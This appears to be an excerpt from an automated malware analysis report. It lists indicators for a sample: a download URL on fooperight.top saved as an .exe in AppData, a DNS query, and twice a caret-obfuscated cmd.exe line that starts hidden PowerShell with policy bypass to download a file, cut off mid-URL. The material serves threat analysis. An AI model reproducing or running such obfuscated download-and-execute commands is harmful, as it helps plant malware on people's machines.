Technical Information
- http://fooperight.top/read.php?f=404 as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWe^rS^H^elL.^e^XE ^-EX^E^CUT^IO^np^ol^Ic^Y ByPasS^ ^-^NO^p^ro^F^I^le^ -W^InD^owstYl^E^ ^H^Idde^n^ (^N^Ew^-oBJecT ^SY^ST^eM^.^N^Et^.wE^B^ClI^ent^)^.doWn^Lo^ad^fiLE^('http://foo...
- DNS ASK fo###right.top
- '<SYSTEM32>\cmd.exe' /c "pOWe^rS^H^elL.^e^XE ^-EX^E^CUT^IO^np^ol^Ic^Y ByPasS^ ^-^NO^p^ro^F^I^le^ -W^InD^owstYl^E^ ^H^Idde^n^ (^N^Ew^-oBJecT ^SY^ST^eM^.^N^Et^.wE^B^ClI^ent^)^.doWn^Lo^ad^fiLE^('http://foo...' (with hidden window)